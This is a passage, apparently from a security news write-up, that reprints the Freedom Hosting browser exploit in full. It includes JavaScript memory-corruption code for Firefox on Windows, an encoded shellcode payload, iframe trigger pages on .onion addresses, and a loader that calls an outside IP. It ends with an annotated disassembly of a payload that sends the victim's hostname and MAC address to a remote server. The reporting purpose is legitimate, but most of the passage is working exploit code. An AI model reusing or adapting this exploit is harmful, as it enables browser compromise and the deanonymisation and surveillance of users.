“\u3152\u8ad2” + “\u8816\u24d0” + “\uc0f0\u04e8” + “\u093c\u0477” + “\u3004\u02eb” + “\u3704\u0788” + “\u8847\u24d0” + “\u3c0f\u7709” + “\u0404\ueb30” + “\u0402\u8837” + “\u4707\ue246” + “\u59d4\ucf29” + “\ufe89\u0158” + “\u8bc4\u4bbd” + “\u0002\uf300” + “\uc6a4\u4f85” + “\u0002\u0100” + “\u2ee8\u0000” + “\u3100\u50c0” + “\u2951\u4fcf” + “\u5357\uc268” + “\u38eb\uff5f” + “\u53d5\u7568” + “\u4d6e\uff61” + “\ue9d5\ufec8” + “\uffff\uc931” + “\ud1f7\uc031” + “\uaef2\ud1f7” + “\uc349\u0000” + “\u0000\u8d00” + “\ue9bd\u0002” + “\ue800\uffe4” + “\uffff\ub94f” + “\u004f\u0000” + “\ub58d\u0275” + “\u0000\ua4f3” + “\ubd8d\u02e9” + “\u0000\ucbe8” + “\uffff\uc3ff” + “\u0a0d\u6f43” + “\u6e6e\u6365” + “\u6974\u6e6f” + “\u203a\u656b” + “\u7065\u612d” + “\u696c\u6576” + “\u0a0d\u6341” + “\u6563\u7470” + “\u203a\u2f2a” + “\u0d2a\u410a” + “\u6363\u7065” + “\u2d74\u6e45” + “\u6f63\u6964” + “\u676e\u203a” + “\u7a67\u7069” + “\u0a0d\u0a0d” + “\u8300\u0ec7” + “\uc931\ud1f7” + “\uc031\uaef3” + “\uff4f\u0de7” + “\u430a\u6f6f” + “\u696b\u3a65” + “\u4920\u3d44” + “\u7377\u5f32” + “\u3233\u4900” + “\u4850\u504c” + “\u5041\u0049” + “\u0002\u5000” + “\ude41\u36ca” + “\u4547\u2054” + “\u312f\u3866” + “\u6134\u3165” + “\u2d64\u6230” + “\u3531\u342d” + “\u6434\u2d63” + “\u3939\u3336” + “\u382d\u6362” + “\u3739\u3131” + “\u3430\u3935” + “\u2030\u5448” + “\u5054\u312f” + “\u312e\u0a0d” + “\u6f48\u7473” + “\u203a\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u0000” + “\u0000\u9000” + “”);
var var29 = magneto;
var var17 = “\u9060”;
var var18 = “\u9061”;
var var19 = “\uC481\u0000\u0008”;
var var20 = “\u2589\u3000” + String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21 = “\u258B\u3000” + String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = “\uE589”;
var var23 = “\uC3C9”;
var var24 = “\uE889”;
var24 += “\u608D\u90C0”;
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16 * 4
var var27 = “”
var27 += “\uB890\u2020\u2020”;
var27 += “\uA390” + ae(var26 + 0x00);
var27 += “\uA390” + ae(var26 + 0x04);
var27 += “\uA390” + ae(var26 + 0x08);
var27 += “\uA390” + ae(var26 + 0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
var var29Array = new Array();
var29Array = ag(var28);
var var29Ad = var13 + 0x5010;
var i = 0;
var j = 0;
var var30 = var13 + 0x4048;
var var31 = new Array();
var31[0] = var30;
var31[1] = var30;
var31[2] = var30;
var31[3] = var15[1];
var31[4] = var29Ad;
var31[5] = 0xFFFFFFFF;
var31[6] = var13 + 0x4044;
var31[7] = var13 + 0x4040;
var31[8] = 0x00000040;
var31[9] = var13 + 0x4048;
var31[10] = 0x00040000;
var31[11] = var29Ad;
var31[12] = var13 + 0x301C;
for (var i = 0 ; i < 0x140 ; i++) {
var31[i + 15] = var15[0];
}
var var32 = 0x3F8;
view[0x800 + 0 + var32] = var13 + 0x4018;
view[0x800 + 1 + var32] = var13 + 0x4018;
for (var i = 2 ; i < var31.length ; i++) {
view[0x800 + i + var32] = 0x41414141;
}
for (var i = 0 ; i < var31.length ; i++) {
view[0xC02 + i + var32] = var31[i];
}
for (var i = 0 ; i < var29Array.length ; i++) {
view[0x1000 + i + var32] = var29Array[i];
}
}
function g(var50, view) {
var k = h(var50, view);
var j = 0;
if (k < 0)
return -1;
view[0x404 + k] = var13 + 0x3010;
return 1;
}
function h(var50, view) {
var address = 0;
var u = 0;
var memory = “”;
var var55 = 0;
for (u = 7; u >= 4 ; u–) {
address = view[0x404 + u];
if (address > 0x000A0000 && address < 0x80000000) {
memory = i(address, 0x48, var50, view);
var55 = af(memory[0x14] + memory[0x15]);
if (var55 == address) {
return u;
}
}
}
return -1;
}
function i(address, size, var50, view) {
var var56 = size / 2;
var56 = var56 * 0x10 + 0x04;
view[0x400] = var56;
view[0x401] = address;
return var4[var50][0];
}
function j(memory, view) {
var intArray = ag(memory);
for (var i = 0 ; i < intArray.length ; i++) {
view[0x404 + i] = intArray[i];
}
}
function k() {
for (var j = 0; j < var1; j++) {
if (var2[j].byteLength != var5) {
return j;
}
}
return -1;
}
function l(view, var58) {
view[var58] = var13 + 0x1030;
view[var58 + 1] = 0xFFFFFF85;
}
function m(view, var58) {
view[var58] = 0x00000000;
for (var j = 0; j < var1; j++) {
if (typeof var4[j] != “undefined”) {
if (var4[j][0] != 0x22556611)
return j;
}
}
return -1
}
function n(view, firstvar58) {
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58 = 0;
for (var i = 0; i < 200; i++) {
if (view[var58] != 0x11336688) {
if (view[var58] == 0x22556611)
return var58;
else
return -1;
}
if (var58 == 0) {
var58 = firstvar58;
} else {
var var59 = view[var58 – 0x0C];
var58 = (var59 – var57) / 4;
}
}
return -1;
}
function o(var60) {
var view = new Int32Array(var2[var60], 0, 0x00040400);
var var59 = view[0x00100000 / 4 – 0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 – var57) / 4);
}
function p() {
for (var j = 0; j < var1; j++) {
for (var i = 1; i < 16; i++) {
if (var3[j][i * 0x4000 – 0x02] == 0x01000000) {
return -i;
}
}
}
return 0;
}
function q(var60) {
var view = new Int32Array(var2[var60], 0, 0x00040400);
view[0x00100000 / 4 – 0x02] = var7;
if (var2[var60 + 1].byteLength == var7)
return var60 + 1;
return -1;
}
function r(var60) {
var view = new Int32Array(var2[var60], 0, 0x00040400);
view[0x00100000 / 4 – 0x02] = var5;
}
function t() {
if (typeof sessionStorage.tempStor != “undefined”)
returnfalse;
sessionStorage.tempStor = “”;
returntrue;
}
function u() {
if (t() == true) {
var9 = 1;
b();
d();
c();
} else {
return;
}
}
function v() {
if (k() == -1) {
var11 = p();
var9 = 2;
c();
} else {
x();
}
}
function w() {
if (var9 == 1)
v();
else
x();
}
function x() {
var var60 = k();
if (var60 == -1)
return;
var nextvar60 = q(var60);
if (nextvar60 == -1)
return;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60], 0, var8);
var var58 = n(var62, var61);
if (var58 == -1)
return;
var var50 = m(var62, var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62, var58);
var var64 = var4[var50][0];
ac(var64, var50, var62, var58, var60);
}
function y(index) {
var4[index][1] = document.createElement(‘span’);
}
function z(index, index2) {
var4[index][1].innerHTML;
}
function aa(view, var63) {
return view[var63];
}
function ab(address, view, var63) {
view[var63] = address;
}
function ac(var64, var50, var62, var58, var60) {
var var15 = ah(var64);
f(var15, var62, var58);
y(var50);
var var66 = aa(var62, var58 + 2);
var var67 = i(var66, 0x40, var50, var62);
j(var67, var62);
g(var50, var62);
ab(var13 + 0x1040, var62, var58 + 2);
r(var60)
setTimeout(ad, 1000);
z(var50);
}
function ad() {
for (var j = 0; j < var1; j++) {
delete var3[j]
var3[j] = null;
delete var2[j];
var2[j] = null;
if (typeof var4[j] != “undefined”) {
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2 = null;
var3 = null;
var4 = null;
}
function ae(int32) {
var var68 = String.fromCharCode((int32) & 0x0000FFFF);
var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
return var68 + var69;
}
function af(string) {
var var70 = string.charCodeAt(0);
var var71 = string.charCodeAt(1);
var var72 = (var71 << 16) + var70;
return var72;
}
function ag(string) {
if (string.length % 2 != 0)
string += “\u9090”;
var intArray = new Array();
for (var i = 0 ; i * 2 < string.length; i++)
intArray[i] = af(string[i * 2] + string[i * 2 + 1]);
return intArray;
}
function ah(var73) {
var var74 = var73.substring(0, 2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0) {
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1) {
return;
}
return var15
}
function aj(version) {
var i = navigator.userAgent.indexOf(“Windows NT”);
if (i != -1)
returntrue;
returnfalse;
}
function ak() {
var ua = navigator.userAgent;
var browser = ua.substring(0, ua.lastIndexOf(“/”));
browser = browser.substring(browser.lastIndexOf(” “) + 1);
if (browser != “Firefox”)
return -1;
var version = ua.substring(ua.lastIndexOf(“/”) + 1);
version = parseInt(version.substring(0, version.lastIndexOf(“.”)));
return version;
}
function al() {
version = ak();
if (!aj(version))
return -1;
return version;
}
function am(var77) {
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510) {
var78 = var77 – 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
elseif (var77 % 0x10000 == 0x9A90) {
var78 = var77 – 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
elseif (var77 % 0x10000 == 0x5E70) {
var78 = var77 – 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
elseif (var77 % 0x10000 == 0x35F3) {
var78 = var77 – 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
elseif (var77 % 0x10000 == 0x5CA0) {
var78 = var77 – 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
elseif (var77 % 0x10000 == 0x5CD0) {
var78 = var77 – 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
elseif (var77 % 0x10000 == 0x6190) {
var78 = var77 – 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
elseif (var77 % 0x10000 == 0x9CB9) {
var78 = var77 – 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
elseif (var77 % 0x10000 == 0x9CE9) {
var78 = var77 – 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
elseif (var77 % 0x10000 == 0x70B0) {
var78 = var77 – 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
elseif (var77 % 0x10000 == 0x7090) {
var78 = var77 – 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
elseif (var77 % 0x10000 == 0x9E49) {
var78 = var77 – 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
elseif (var77 % 0x10000 == 0x9E69) {
var78 = var77 – 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
elseif (var77 % 0x10000 == 0x9EB9) {
var78 = var77 – 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else {
return -1;
}
return var15;
}
window.addEventListener(“onload”, u(), true);
</script>
nl7qbezu7pqsuone.onion/content_2.html:
<html>
<body>
</body>
</html><script>
var y = “?????”, url = window.location.href; if (0 > url.indexOf(y)) { var iframe = document.createElement(“iframe”); iframe.src = “content_3.html”; document.body.appendChild(iframe) } else parent.w(); function df() { return parent.df() };
</script>
nl7qbezu7pqsuone.onion/content_3.html:
<script>
var y = “?????”, z = “”, z = z + “<body”, z = z + “>”, z = z + “<img”, z = z + ” height=’1′ width=’1′ src=’error.html'”, z = z + ‘ onerror=”javascript: ‘, z = z + (“window.location.href=’content_2.html” + y + “‘;\” “), z = z + “>”, z = z + “</body”, z = z + “>”, flag = !1, var83 = 0;
function b() { for (var e = Array(1024), d = Array(1024), c = 0; 1024 > c; c++) e[c] = new ArrayBuffer(180); for (c = 0; 1024 > c; c++) d[c] = new Int32Array(e[c], 0, 45), d[c][9] = var83; return d } function a() { !1 == flag && (flag = !0, window.stop()); window.stop(); b(); window.parent.frames[0].frameElement.ownerDocument.write(z); b() } var83 = parent.df(); 0 != var83 && document.addEventListener(“readystatechange”, a, !1);
</script>
A then we have this little beauty
function createCookie(name, value, minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime() + (minutes * 60 * 1000));
var expires = “; expires=” + date.toGMTString();
}
else var expires = “”;
document.cookie = name + “=” + value + expires + “; path=/”;
}
function readCookie(name) {
var nameEQ = name + “=”;
var ca = document.cookie.split(‘;’);
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ‘ ‘) c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
}
return null;
}
function isFF() {
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
var iframe = document.createElement(‘iframe’);
iframe.style.display = “inline”;
iframe.frameBorder = “0”;
iframe.scrolling = “no”;
iframe.src = “http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66”;
iframe.height = “5”;
iframe.width = “*”;
document.body.appendChild(iframe);
}
function freedomhost() {
if (!readCookie(“n_serv”)) {
createCookie(“n_serv”, “eb5f2c80-fc81-11e2-b778-0800200c9a66”, 30);
updatify();
}
}
function isReady() {
if (document.readyState === “interactive” || document.readyState === “complete”) {
if (isFF()) {
//window.alert(window.location + “Firefox Detected.”)
freedomhost();
}
}
else {
setTimeout(isReady, 250);
}
}
setTimeout(isReady, 250);
A lightly annotated disassembly of the obfuscated Windows .exe payload (which can be found in the magneto variable in the javascript code) is included below. The payload looks up the victim’s MAC address and machine hostname and sends it to the host server.
Payload disassembly
00000000 skipping 0x91 bytes
00000091 5D pop ebp
00000092 81BDE90200004745 cmp dword [ebp+0x2e9],0x20544547 # “GET ”
-5420
0000009C 7570 jnz 0x10e
0000009E 8D85D1020000 lea eax,[ebp+0x2d1] “ws2_32”
000000A4 50 push eax
000000A5 684C772607 push dword 0x726774c # LoadLibraryA
000000AA FFD5 call ebp
000000AC 85C0 test eax,eax
000000AE 745E jz 0x10e
000000B0 8D85D8020000 lea eax,[ebp+0x2d8] “IPHLPAPI”
000000B6 50 push eax
000000B7 684C772607 push dword 0x726774c # LoadLibraryA
000000BC FFD5 call ebp # ebp = find function
000000BE 85C0 test eax,eax
000000C0 744C jz 0x10e
000000C2 BB90010000 mov ebx,0x190
000000C7 29DC sub esp,ebx
000000C9 54 push esp
000000CA 53 push ebx
000000CB 6829806B00 push dword 0x6b8029 # WSAStartupA
000000D0 FFD5 call ebp
000000D2 01DC add esp,ebx
000000D4 85C0 test eax,eax
000000D6 7536 jnz 0x10e
000000D8 50 push eax
000000D9 50 push eax
000000DA 50 push eax
000000DB 50 push eax
000000DC 40 inc eax
000000DD 50 push eax
000000DE 40 inc eax
000000DF 50 push eax
000000E0 68EA0FDFE0 push dword 0xe0df0fea # WSASocketA
000000E5 FFD5 call ebp
000000E7 31DB xor ebx,ebx
000000E9 F7D3 not ebx
000000EB 39C3 cmp ebx,eax
000000ED 741F jz 0x10e
000000EF 89C3 mov ebx,eax
000000F1 6A10 push byte +0x10
000000F3 8DB5E1020000 lea esi,[ebp+0x2e1] # struct sockaddr_in { AF_INET, 80, 65.222.202.54 }
000000F9 56 push esi
000000FA 53 push ebx
000000FB 6899A57461 push dword 0x6174a599 # connect
00000100 FFD5 call ebp
00000102 85C0 test eax,eax
00000104 741F jz 0x125
00000106 FE8D89000000 dec byte [ebp+0x89] # Try to connect 5 times
0000010C 75E3 jnz 0xf1
0000010E 80BD4F02000001 cmp byte [ebp+0x24f],0x1
00000115 7407 jz 0x11e
00000117 E83B010000 call 0x257
0000011C EB05 jmp short 0x123
0000011E E84D010000 call 0x270
00000123 FFE7 jmp edi
00000125 B800010000 mov eax,0x100
0000012A 29C4 sub esp,eax
0000012C 89E2 mov edx,esp
0000012E 52 push edx
0000012F 50 push eax
00000130 52 push edx
00000131 68B649DE01 push dword 0x1de49b6 # gethostname
00000136 FFD5 call ebp
00000138 5F pop edi
00000139 81C400010000 add esp,0x100
0000013F 85C0 test eax,eax
00000141 0F85F2000000 jnz near 0x239
00000147 57 push edi
00000148 E8F9000000 call 0x246 # strlen of gethostname
0000014D 5E pop esi
0000014E 89CA mov edx,ecx
00000150 8DBDE9020000 lea edi,[ebp+0x2e9]
00000156 E8EB000000 call 0x246 # strlen (to move EDI to the NULL byte at the end of the HTTP string)
0000015B 4F dec edi
0000015C 83FA20 cmp edx,byte +0x20
0000015F 7C05 jl 0x166
00000161 BA20000000 mov edx,0x20
00000166 89D1 mov ecx,edx
00000168 56 push esi
00000169 F3A4 rep movsb
0000016B B90D000000 mov ecx,0xd
00000170 8DB5C4020000 lea esi,[ebp+0x2c4] “\r\nCookie: ID=”
00000176 F3A4 rep movsb
00000178 89BD4B020000 mov [ebp+0x24b],edi
0000017E 5E pop esi
0000017F 56 push esi
00000180 68A9283480 push dword 0x803428a9 # gethostbyname
00000185 FFD5 call ebp
00000187 85C0 test eax,eax
00000189 0F84AA000000 jz near 0x239
0000018F 668B480A mov cx,[eax+0xa]
00000193 6683F904 cmp cx,byte +0x4
00000197 0F829C000000 jc near 0x239
0000019D 8D400C lea eax,[eax+0xc]
000001A0 8B00 mov eax,[eax]
000001A2 8B08 mov ecx,[eax]
000001A4 8B09 mov ecx,[ecx]
000001A6 B800010000 mov eax,0x100
000001AB 50 push eax
000001AC 89E7 mov edi,esp
000001AE 29C4 sub esp,eax
000001B0 89E6 mov esi,esp
000001B2 57 push edi
000001B3 56 push esi
000001B4 51 push ecx
000001B5 51 push ecx
000001B6 684872D2B8 push dword 0xb8d27248 # iphlpapi.dll!SendARP
000001BB FFD5 call ebp
000001BD 85C0 test eax,eax
000001BF 81C404010000 add esp,0x104
000001C5 0FB70F movzx ecx,word [edi]
000001C8 83F906 cmp ecx,byte +0x6
000001CB 726C jc 0x239
000001CD B906000000 mov ecx,0x6
000001D2 B810000000 mov eax,0x10
000001D7 29C4 sub esp,eax
000001D9 89E7 mov edi,esp
000001DB 89CA mov edx,ecx
000001DD D1E2 shl edx,1
000001DF 50 push eax
000001E0 52 push edx
000001E1 31D2 xor edx,edx
000001E3 8A16 mov dl,[esi]
000001E5 88D0 mov al,dl
000001E7 24F0 and al,0xf0 # It actually turns the raw data into hex strings before appending it to the HTTP header
000001E9 C0E804 shr al,0x4
000001EC 3C09 cmp al,0x9
000001EE 7704 ja 0x1f4
000001F0 0430 add al,0x30
000001F2 EB02 jmp short 0x1f6
000001F4 0437 add al,0x37
000001F6 8807 mov [edi],al
000001F8 47 inc edi
000001F9 88D0 mov al,dl
000001FB 240F and al,0xf
000001FD 3C09 cmp al,0x9
000001FF 7704 ja 0x205
00000201 0430 add al,0x30
00000203 EB02 jmp short 0x207
00000205 0437 add al,0x37
00000207 8807 mov [edi],al
00000209 47 inc edi
0000020A 46 inc esi
0000020B E2D4 loop 0x1e1
0000020D 59 pop ecx
0000020E 29CF sub edi,ecx
00000210 89FE mov esi,edi
00000212 58 pop eax
00000213 01C4 add esp,eax
00000215 8BBD4B020000 mov edi,[ebp+0x24b]
0000021B F3A4 rep movsb
0000021D C6854F02000001 mov byte [ebp+0x24f],0x1
00000224 E82E000000 call 0x257 # Append “Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n” and return the new strlen(ebp + 0x2e9)
00000229 31C0 xor eax,eax
0000022B 50 push eax
0000022C 51 push ecx
0000022D 29CF sub edi,ecx
0000022F 4F dec edi
00000230 57 push edi
00000231 53 push ebx
00000232 68C2EB385F push dword 0x5f38ebc2 # send
00000237 FFD5 call ebp
00000239 53 push ebx
0000023A 68756E4D61 push dword 0x614d6e75 # closesocket
0000023F FFD5 call ebp
00000241 E9C8FEFFFF jmp 0x10e
00000246 31C9 xor ecx,ecx
00000248 F7D1 not ecx
0000024A 31C0 xor eax,eax
0000024C F2AE repne scasb
0000024E F7D1 not ecx
00000250 49 dec ecx
00000251 C3 ret
00000252 0000 add [eax],al
00000254 0000 add [eax],al
00000256 008DBDE90200 add [ebp+0x2e9bd],cl
0000025C 00E8 add al,ch
0000025E E4FF in al,0xff
00000260 FF db 0xFF
00000261 FF4FB9 dec dword [edi-0x47]
00000264 4F dec edi
00000265 0000 add [eax],al
00000267 008DB5750200 add [ebp+0x275b5],cl
0000026D 00F3 add bl,dh
0000026F A4 movsb
00000270 8DBDE9020000 lea edi,[ebp+0x2e9]
00000276 E8CBFFFFFF call 0x246
0000027B C3 ret
0000027C 0D0A436F6E or eax,0x6e6f430a
00000281 6E outsb
00000282 656374696F arpl [gs:ecx+ebp*2+0x6f],si
00000287 6E outsb
00000288 3A20 cmp ah,[eax]
0000028A 6B656570 imul esp,[ebp+0x65],byte +0x70
0000028E 2D616C6976 sub eax,0x76696c61
00000293 650D0A416363 gs or eax,0x6363410a
00000299 657074 gs jo 0x310
0000029C 3A20 cmp ah,[eax]
0000029E 2A2F sub ch,[edi]
000002A0 2A0D0A416363 sub cl,[0x6363410a]
000002A6 657074 gs jo 0x31d
000002A9 2D456E636F sub eax,0x6f636e45
000002AE 64696E673A20677A imul ebp,[fs:esi+0x67],dword 0x7a67203a
000002B6 69700D0A0D0A00 imul esi,[eax+0xd],dword 0xa0d0a
000002BD 83C70E add edi,byte +0xe
000002C0 31C9 xor ecx,ecx
000002C2 F7D1 not ecx
000002C4 31C0 xor eax,eax
000002C6 F3AE repe scasb
000002C8 4F dec edi
000002C9 FFE7 jmp edi
000002CB 0D0A436F6F or eax,0x6f6f430a
000002D0 6B69653A imul ebp,[ecx+0x65],byte +0x3a
000002D4 204944 and [ecx+0x44],cl
000002D7 3D7773325F cmp eax,0x5f327377
000002DC 3332 xor esi,[edx]
000002DE 004950 add [ecx+0x50],cl
000002E1 48 dec eax
000002E2 4C dec esp
000002E3 50 push eax
000002E4 41 inc ecx
000002E5 50 push eax
000002E6 49 dec ecx
000002E7 0002 add [edx],al
000002E9 0000 add [eax],al
000002EB 50 push eax
000002EC 41 inc ecx
000002ED DECA fmulp st2
000002EF 3647 ss inc edi
000002F1 45 inc ebp
000002F2 54 push esp
000002F3 202F and [edi],ch
000002F5 303563656134 xor [0x34616563],dh
000002FB 64652D39353164 gs sub eax,0x64313539
00000302 2D34303337 sub eax,0x37333034
00000307 2D62663866 sub eax,0x66386662
0000030C 2D66363930 sub eax,0x30393666
00000311 3535623237 xor eax,0x37326235
00000316 396262 cmp [edx+0x62],esp
00000319 204854 and [eax+0x54],cl
0000031C 54 push esp
0000031D 50 push eax
0000031E 2F das
0000031F 312E xor [esi],ebp
00000321 310D0A486F73 xor [0x736f480a],ecx
00000327 743A jz 0x363
00000329 2000 and [eax],al
0000032B 0000 add [eax],al
0000032D 0000 add [eax],al
0000032F 0000 add [eax],al
00000331 0000 add [eax],al
00000333 0000 add [eax],al
00000335 0000 add [eax],al
00000337 0000 add [eax],al
00000339 0000 add [eax],al
0000033B 0000 add [eax],al
0000033D 0000 add [eax],al
0000033F 0000 add [eax],al
00000341 0000 add [eax],al
00000343 0000 add [eax],al
00000345 0000 add [eax],al
00000347 0000 add [eax],al
00000349 0000 add [eax],al
0000034B 0000 add [eax],al
0000034D 0000 add [eax],al
0000034F 0000 add [eax],al
00000351 0000 add [eax],al
00000353 0000 add [eax],al
00000355 0000 add [eax],al
00000357 0000 add [eax],al
00000359 0000 add [eax],al
0000035B 0000 add [eax],al
0000035D 0000 add [eax],al
0000035F 0000 add [eax],al
00000361 0000 add [eax],al
00000363 0000 add [eax],al
00000365 0000 add [eax],al
00000367 0000 add [eax],al
00000369 0000 add [eax],al
0000036B 0000 add [eax],al
0000036D 0000 add [eax],al
0000036F 0000 add [eax],al
00000371 0000 add [eax],al
00000373 0000 add [eax],al
00000375 0000 add [eax],al
00000377 0000 add [eax],al
00000379 0000 add [eax],al
0000037B 0000 add [eax],al
0000037D 0000 add [eax],al
0000037F 0000 add [eax],al
00000381 0000 add [eax],al
00000383 0000 add [eax],al
00000385 0000 add [eax],al
00000387 0000 add [eax],al
00000389 0000 add [eax],al
0000038B 0000 add [eax],al
0000038D 0000 add [eax],al
0000038F 0000 add [eax],al
00000391 0000 add [eax],al
00000393 0000 add [eax],al
00000395 0000 add [eax],al
00000397 0000 add [eax],al
00000399 0000 add [eax],al
0000039B 0000 add [eax],al
0000039D 0000 add [eax],al
0000039F 0000 add [eax],al
000003A1 0000 add [eax],al
000003A3 0000 add [eax],al
000003A5 0000 add [eax],al
000003A7 0000 add [eax],al
000003A9 0000 add [eax],al
000003AB 0000 add [eax],al
000003AD 0000 add [eax],al
000003AF 0000 add [eax],al
000003B1 0000 add [eax],al
000003B3 0000 add [eax],al
000003B5 0000 add [eax],al
000003B7 0000 add [eax],al
000003B9 0000 add [eax],al
000003BB 90 nop
Sources: Extreme Tech, Naked Security, Ars Technica, Information Week, SANS, Darker Net